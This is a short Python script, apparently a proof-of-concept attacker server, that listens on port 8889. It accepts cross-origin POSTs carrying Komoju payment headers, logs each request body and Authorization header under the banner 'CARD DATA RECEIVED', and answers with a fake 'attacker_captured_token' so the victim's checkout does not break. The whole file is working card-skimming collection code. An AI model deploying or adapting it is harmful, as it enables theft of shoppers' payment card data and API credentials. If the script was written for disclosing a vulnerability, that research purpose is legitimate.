#!/usr/bin/env python3
import http.server, json, sys, datetime

class Handler(http.server.BaseHTTPRequestHandler):
    def do_OPTIONS(self):
        self.send_response(200)
        self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Access-Control-Allow-Methods', 'POST, GET, OPTIONS')
        self.send_header('Access-Control-Allow-Headers', 'Content-Type, Authorization, komoju-via, X-Komoju-API-Version')
        self.end_headers()

    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-Type', 'application/json')
        self.send_header('Access-Control-Allow-Origin', '*')
        self.end_headers()
        self.wfile.write(b'{"status":"attacker_server_ready"}')

    def do_POST(self):
        length = int(self.headers.get('Content-Length', 0))
        body = self.rfile.read(length)
        ts = datetime.datetime.now().strftime('%H:%M:%S')
        print(f"\n{'='*70}", flush=True)
        print(f"[{ts}] *** CARD DATA RECEIVED ***", flush=True)
        print(f"  PATH: {self.path}", flush=True)
        print(f"  Authorization: {self.headers.get('Authorization','(none)')}", flush=True)
        print(f"  komoju-via: {self.headers.get('komoju-via','')}", flush=True)
        print(f"  BODY: {body.decode('utf-8','replace')}", flush=True)
        print(f"{'='*70}", flush=True)
        sys.stdout.flush()
        self.send_response(200)
        self.send_header('Content-Type', 'application/json')
        self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Access-Control-Allow-Headers', '*')
        self.end_headers()
        self.wfile.write(b'{"id":"attacker_captured_token","status":"ok"}')

    def log_message(self, fmt, *args):
        pass

server = http.server.HTTPServer(('0.0.0.0', 8889), Handler)
print("[ATTACKER] Listening on 0.0.0.0:8889", flush=True)
server.serve_forever()